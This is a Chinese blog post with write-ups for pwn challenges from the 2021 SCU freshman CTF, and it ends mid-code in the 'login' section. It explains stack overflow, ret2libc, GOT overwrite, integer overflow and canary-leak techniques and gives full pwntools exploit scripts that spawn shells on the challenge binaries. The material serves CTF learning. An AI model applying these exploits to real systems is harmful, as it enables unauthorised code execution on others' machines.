



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="清風微醺" href="https://www.wdqjxtmph.top/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="清風微醺" href="https://www.wdqjxtmph.top/atom.xml" />
<link rel="alternate" type="application/json" title="清風微醺" href="https://www.wdqjxtmph.top/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="wp" />


<link rel="canonical" href="https://www.wdqjxtmph.top/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/">



  <title>
SCU新生赛2021 pwn wp - CTF |
Nirvana = 清風微醺 = 凌恒</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">SCU新生赛2021 pwn wp
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-11-29 00:36:00">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-11-29T00:36:00+08:00">2021-11-29</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>12k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>10 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Nirvana</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclil3m4ej20zk0m8tn8.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gicitspjpbj20zk0m81ky.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipetlbztpj20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giciub8ja1j20zk0m81ky.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclhfehz7j20zk0m8u0x.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giciusoyjnj219g0u0x56.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/CTF/" itemprop="item" rel="index" title="分类于 CTF"><span itemprop="name">CTF</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://www.wdqjxtmph.top/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="invincible">
    <meta itemprop="description" content="凌恒, 凌恒山其若陋兮、">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="清風微醺">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>前段时间的极客大挑战 2021 和 2021 年的 SCU 新生赛，最后一道题都没有做出来，作为一枚大二学长确实应该反省一下自己了。太菜了呜呜呜。极客大挑战因为打太久了，题目都快忘记了，就不写 wp 了。</p>
<h1 id="ret2text"><a class="markdownIt-Anchor" href="#ret2text">#</a> ret2text</h1>
<p>简单的栈溢出，pwn 里的 hello world。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">&quot;/mnt/hgfs/ubuntu/stackoverflow&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;/mnt/hgfs/ubuntu/stackoverflow&quot;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x38</span>+p64(elf.symbols[<span class="string">&quot;backdoor&quot;</span>])</span><br><span class="line">r.recvuntil(<span class="string">b&quot;Do you know stack overflow and ret2text?&quot;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="ret2shellcode"><a class="markdownIt-Anchor" href="#ret2shellcode">#</a> ret2shellcode</h1>
<p>最基础的 shellcode，可以自己写，也可以直接用 pwntools 里的 shellcraft 模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&quot;amd64&quot;</span>,os=<span class="string">&quot;linux&quot;</span>)</span><br><span class="line">r = process(<span class="string">&quot;/mnt/hgfs/ubuntu/ret2shellcode&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&quot;Your input will be saved at &quot;</span>)</span><br><span class="line">shellcode_addr = <span class="built_in">int</span>(r.recvuntil(<span class="string">b&#x27;\n&#x27;</span>),<span class="number">16</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">r.recvuntil(<span class="string">&quot;Input: &quot;</span>)</span><br><span class="line">payload = shellcode.ljust(<span class="number">0x88</span>,<span class="string">b&#x27;a&#x27;</span>)+p64(shellcode_addr)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="quiz"><a class="markdownIt-Anchor" href="#quiz">#</a> quiz</h1>
<p>在线测试题，主要考察整数溢出和汇编的问题。</p>
<h1 id="ret2libc"><a class="markdownIt-Anchor" href="#ret2libc">#</a> ret2libc</h1>
<p>链接：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMVQ5NElielpwQVdDaGVyT2ZabDV4UXc=">https://pan.baidu.com/s/1T94IbzZpAWCherOfZl5xQw</span><br>
 提取码：F1re</p>
<p>checksec 一下，除了 canary 保护外全开。</p>
<h2 id="思路"><a class="markdownIt-Anchor" href="#思路">#</a> 思路</h2>
<h3 id="0x1地址泄露"><a class="markdownIt-Anchor" href="#0x1地址泄露">#</a> 0x1 地址泄露</h3>
<p><img data-src="https://tva4.sinaimg.cn/large/008qDYGVgy1gww4pz14ygj30p505v77o.jpg" alt="1"></p>
<p>choice 选择 1 后可以泄露一些地址，其中泄露了一个函数的地址，和 puts 函数的地址，可以通过这两个得到 elf 文件基址和 libc 基址。</p>
<h3 id="0x2栈溢出"><a class="markdownIt-Anchor" href="#0x2栈溢出">#</a> 0x2 栈溢出</h3>
<p><img data-src="https://tvax2.sinaimg.cn/large/008qDYGVgy1gww4q6xyl9j30qc06y427.jpg" alt="2"></p>
<p>然后就是 choice 选择 2 后一个明显的栈溢出漏洞。</p>
<p>不过这道题有点搞的是，我用 system+/bin/sh 的方式不能 getshell，最后用 one_gadget 成功 getshell。最后注意用一个 ret 指令平衡栈帧。</p>
<h2 id="exp"><a class="markdownIt-Anchor" href="#exp">#</a> exp</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">libc = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/ret2libc/libc-2.23.so&#x27;</span>)</span><br><span class="line"><span class="comment"># r = process(&#x27;/mnt/hgfs/ubuntu/ret2libc/ret2libc&#x27;)</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;Your choice: &quot;</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;You need to figure it out:&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;0xdeadbeef &quot;</span>)</span><br><span class="line">elf_addr = <span class="built_in">int</span>(r.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line">elf_base = elf_addr-<span class="number">0x13d3</span></span><br><span class="line">r.recv(<span class="number">1</span>)</span><br><span class="line">puts_addr=<span class="built_in">int</span>(r.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(puts_addr))</span><br><span class="line">libc_base=puts_addr-libc.symbols[<span class="string">&quot;puts&quot;</span>]</span><br><span class="line">system_addr = libc_base+libc.symbols[<span class="string">&quot;system&quot;</span>]</span><br><span class="line">bin_sh = <span class="number">0x18ce57</span></span><br><span class="line">one_gadget = libc_base+<span class="number">0xf03a4</span></span><br><span class="line">pop_rdi = <span class="number">0x1613</span>+elf_base</span><br><span class="line">ret = elf_base+<span class="number">0x101a</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;elf_base:&quot;</span>+<span class="built_in">hex</span>(elf_base))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libc_base: &quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">r.recvuntil(<span class="string">&quot;Your choice: &quot;</span>)</span><br><span class="line"><span class="comment"># payload = b&#x27;a&#x27;*0x18+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)</span></span><br><span class="line">payload =<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x18</span>+p64(ret)+p64(one_gadget)</span><br><span class="line">r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;input: &quot;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="got_it"><a class="markdownIt-Anchor" href="#got_it">#</a> got_it</h1>
<p>链接：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMVY5X0ZBOFhJSHJhdkt0OVp0WGhRSXc=">https://pan.baidu.com/s/1V9_FA8XIHravKt9ZtXhQIw</span><br>
 提取码：F1re</p>
<p>checksec 一下，除了 RELEO 保护，其他保护全开。</p>
<p>函数定义了一个数组，数组储存了几个学 pwn 的经典网站，函数有三个功能：</p>
<ul>
<li>
<p>show：展示数组内某一个网站的网址。</p>
</li>
<li>
<p>edit：修改某一个网址的内容。但是可以看到输入长度 0x12 大于其数组元素长度 0x8，存在溢出。</p>
</li>
<li>
<p>exit：退出程序。</p>
</li>
</ul>
<h2 id="思路-2"><a class="markdownIt-Anchor" href="#思路-2">#</a> 思路</h2>
<h3 id="0x1溢出"><a class="markdownIt-Anchor" href="#0x1溢出">#</a> 0x1 溢出</h3>
<p><img data-src="https://tvax1.sinaimg.cn/large/008qDYGVgy1gww4qbqg1nj30kl07xjsy.jpg" alt="3"></p>
<p>存在 0x8 的溢出长度。</p>
<h3 id="0x2控制函数指针"><a class="markdownIt-Anchor" href="#0x2控制函数指针">#</a> 0x2 控制函数指针</h3>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gww4qiac8lj30qf0cndqm.jpg" alt="4"></p>
<p>其中 0x36E0 后储存的是数组变量的地址。</p>
<p>而 0x36E0 前储存的是数组变量。</p>
<p>结合之前我们发现的 0x8 的溢出长度，可以对 0x36D0 处最后一个网址使用 edit 函数，可覆写到储存第一个数组元素的指针。</p>
<h3 id="0x3-pie绕过改写got表"><a class="markdownIt-Anchor" href="#0x3-pie绕过改写got表">#</a> 0x3 pie 绕过，改写 GOT 表</h3>
<p>由于程序未开 RELEO 保护，我们可以考虑改写函数 GOT 表，又由于程序开了 pie 保护，我们打算用 partial write 绕过。</p>
<p><img data-src="https://tvax2.sinaimg.cn/large/008qDYGVgy1gww4qmc6wgj30p907kth6.jpg" alt="5"></p>
<p>发现 atoi_addr 与第一个函数指针之间只有最后一个字节不一样。因此我们只用覆写指针第一个字节为’\x40’。利用 show 函数泄露函数真实地址，从而计算出 libc 基址，然后再 edit 数组第一个元素，即可把 atoi_got 改写为 one_gadget 的值。</p>
<h2 id="exp-2"><a class="markdownIt-Anchor" href="#exp-2">#</a> exp</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># r = process(&#x27;/mnt/hgfs/ubuntu/got_it/got_it&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/got_it/got_it&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/got_it/libc-2.23.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">&quot;&gt; &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;which? &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params"><span class="built_in">id</span>,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">&quot;&gt; &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;which? &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;your new website: &quot;</span>)</span><br><span class="line">    r.send(content)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+<span class="string">b&#x27;\x40&#x27;</span></span><br><span class="line">edit(<span class="number">4</span>,payload)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;website: &quot;</span>)</span><br><span class="line">atoi_addr = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\0&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;atoi_got: &quot;</span>+<span class="built_in">hex</span>(atoi_addr))</span><br><span class="line">libc_base = atoi_addr - libc.symbols[<span class="string">&quot;atoi&quot;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libc_base: &quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">one_gadget = <span class="number">0xf1247</span>+libc_base</span><br><span class="line">payload2= p64(one_gadget)</span><br><span class="line">edit(<span class="number">0</span>,payload2)</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h1 id="safe_copy"><a class="markdownIt-Anchor" href="#safe_copy">#</a> safe_copy</h1>
<p>链接：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMUhGeGdoMG1ucldKdDc2TEJjOXQ5cHc=">https://pan.baidu.com/s/1HFxgh0mnrWJt76LBc9t9pw</span><br>
 提取码：F1re</p>
<p>真丶题如其意。checksec，保护全开。</p>
<p>IDA 反汇编出来代码有点乱，花了半个小时才大概理解程序流程。</p>
<p>函数主要流程是</p>
<ul>
<li>
<p>读取 0x100 大小的内容到 buf 数组中，读取 offset，Max_copylen，boundary 三个属性。</p>
</li>
<li>
<p>初始化 0x10 大小的 s 数组，全用 “#” 填充，同时将 s 数组相邻的 0x90 大小的栈空间内也全用 “#” 填充。</p>
</li>
<li>
<p>读取 copy_len，开始从 buf 数组中向 s 数组中 copy。</p>
</li>
<li>
<p>offset 确定了从 s 数组的第几个下标开始 copy，max_copylen 确定了最大 copy 长度，boundary 定义的则是最多能够 copy 到的 s 数组的最大下标。</p>
</li>
</ul>
<p>以上的程序流程可以不断重复，直到输入到 buf 数组中的值为 &quot;exit \n&quot;。</p>
<p>理解程序流程后，我们可以基本肯定漏洞只能从几个参数：offset，Max_copylen，boundary，copy_len 几个参数上动手脚。因此我着重查看处理那几个参数的函数，并且检查参数本身逻辑并没问题，那么漏洞基本上只能出在整数溢出上。</p>
<h2 id="思路-3"><a class="markdownIt-Anchor" href="#思路-3">#</a> 思路</h2>
<h3 id="0x1整数溢出"><a class="markdownIt-Anchor" href="#0x1整数溢出">#</a> 0x1 整数溢出</h3>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gww4s6o06aj30to0i0tg6.jpg" alt="10"></p>
<p>显然我们是想控制 offset 的值，达到 copy 到栈溢出的位置。检查到</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( offset &lt; <span class="number">0</span> || boundary &gt; <span class="number">0x100</span> || max_copylen &lt;= <span class="number">0</span> || offset + max_copylen &gt;= (<span class="keyword">int</span>)boundary )</span><br></pre></td></tr></table></figure>
<p>发现 offset 与 max_copylen 均为 int 型变量，且 max_copylen 对程序 copy 流程无太大影响，因此我们可以令 max_copylen 为接近 INT_MAX 的值，利用整数溢出使得满足<strong> offset + max_copylen &lt;= (int) boundary</strong>，并且也可以控制 offset 的值。</p>
<h3 id="0x2泄露canary与libc基址"><a class="markdownIt-Anchor" href="#0x2泄露canary与libc基址">#</a> 0x2 泄露 canary 与 libc 基址</h3>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gww4qrupl8j30kl0d87e3.jpg" alt="6"></p>
<p>可以观察到在 s 数组下方 0x8 地址处存在 canary 值与 libc_start_main_240 的地址，</p>
<p>由于 canary 第一位是’\0’，覆盖到 canary 第一位后，可以通过程序流程中的 put 泄露出 canary，** 使用 rjust 补足 canary。** 同时用相同方法泄露 libc_start_main_240 的地址，计算出 libc 基址，最后栈溢出 getshell。</p>
<p>最后在退出的时候倒是卡了半天… 需要在 buf 数组开头写入 &quot;exit\n&quot;，<strong>且加上 &quot;\0&quot; 进行隔断</strong>。</p>
<h2 id="exp-3"><a class="markdownIt-Anchor" href="#exp-3">#</a> exp</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="comment"># r = process(&#x27;/mnt/hgfs/ubuntu/safe_copy/safe_copy&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/safe_copy/safe_copy&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/safe_copy/libc-2.23.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">copy</span>(<span class="params">padding,start_offset,length,boundary,copylength</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">&quot;Your input: &quot;</span>)</span><br><span class="line">    r.sendline(padding)</span><br><span class="line">    r.recvuntil(<span class="string">&quot;Start offset: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(start_offset))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;Max copy len: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(length))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;Copy boundary: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(boundary))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;Copy len:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(copylength))</span><br><span class="line"></span><br><span class="line">copy(<span class="string">b&#x27;aaaaaaaaa&#x27;</span> ,<span class="number">0x100</span>,<span class="number">0x7fffffff</span>,<span class="number">11</span>,<span class="number">9</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Result:&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&quot;aaaaaaaaa&quot;</span>)</span><br><span class="line">canary = u64(r.recv(<span class="number">7</span>).rjust(<span class="number">8</span>,<span class="string">b&#x27;\0&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;canary : &quot;</span>+<span class="built_in">hex</span>(canary))</span><br><span class="line">copy(<span class="string">b&#x27;aaaaaaaa&#x27;</span>*<span class="number">7</span>,<span class="number">0x100</span>,<span class="number">0x7fffffff</span>,<span class="number">100</span>,<span class="number">56</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&quot;aaaaaaaa&quot;</span>*<span class="number">7</span>)</span><br><span class="line">libc_start_main_240 = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\0&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libc_start_main_240: &quot;</span>+<span class="built_in">hex</span>(libc_start_main_240))</span><br><span class="line">libc_base = libc_start_main_240-libc.symbols[<span class="string">&quot;__libc_start_main&quot;</span>]-<span class="number">240</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libc_base: &quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">one_gadget = libc_base+<span class="number">0x45226</span></span><br><span class="line">payload = p32(<span class="number">1953069157</span>)+<span class="string">b&#x27;\n&#x27;</span>+<span class="string">b&#x27;\0&#x27;</span>*<span class="number">3</span>+p64(canary)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>+p64(one_gadget)</span><br><span class="line">copy(payload,<span class="number">0x100</span>,<span class="number">0x7fffffff</span>,<span class="number">0x100</span>,<span class="number">64</span>)</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h1 id="login"><a class="markdownIt-Anchor" href="#login">#</a> login</h1>
<p>链接：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMWhDY2R2ZnFkbGM4MzZVYVQ3Q0JHSFE=">https://pan.baidu.com/s/1hCcdvfqdlc836UaT7CBGHQ</span><br>
 提取码：F1re</p>
<h2 id="程序流程分析"><a class="markdownIt-Anchor" href="#程序流程分析">#</a> 程序流程分析</h2>
<p>一道题看一下午，仍然一点思路都没有。</p>
<p>程序流程：</p>
<ul>
<li>
<p>自带一个 root 用户，id 为特殊的 0，密码通过 linux 中的 urandom 自动生成，每位密码的生成流程为：①从 /dev/urandom 中读取四位数字作为随机数种子。②调用 srand 函数。③生成一位密码。④直到生成 0x30 位密码</p>
</li>
<li>
<p>add user：添加用户，属性有①密码②id③密码长度。（id 不能为 0）</p>
</li>
<li>
<p>login：用户登入，如果登入的用户为 root 用户，拥有一个 UAF 漏洞。</p>
</li>
<li>
<p>delete user：删除用户。</p>
</li>
</ul>
<h2 id="思路-4"><a class="markdownIt-Anchor" href="#思路-4">#</a> 思路</h2>
<h3 id="root用户"><a class="markdownIt-Anchor" href="#root用户">#</a> root 用户</h3>
<p>刚开始我认为 root 用户的密码在程序启动时就生成，并且每一位密码都有一个随机的种子，所以是无法爆破的。因此只能去将普通用户的 id 改为 0。于是我找了半天整数溢出的漏洞，想要把普通用户的 id 改为 0，最终无疾而终。</p>
<p>直到放出 hint：侧信道攻击。</p>
<p>网上百度了一下，侧信道攻击基本 = 爆破，不过是逐位爆破检查是否成功。</p>
<p>因此我仔细去检查了 check（密码检测）函数。</p>
<p><img data-src="https://tva3.sinaimg.cn/large/008qDYGVgy1gww4r66uq6j30nz0j4dlp.jpg" alt="7"></p>
<p>发现密码如果错误，会以 % s 打印出错误密码，% s 存在泄露后面数据的可能，因此我去查看了栈空间。</p>
<p><img data-src="https://tvax1.sinaimg.cn/large/008qDYGVgy1gww4rcb23kj30x50j6amm.jpg" alt="8"></p>
<p>如图 var_30 的值对应 check 函数中的 v7 (也就是正确密码的个数)。</p>
<p>那就简单了，逐位爆破密码。</p>
<p>先定义基本函数体：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,<span class="built_in">id</span>,password</span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span 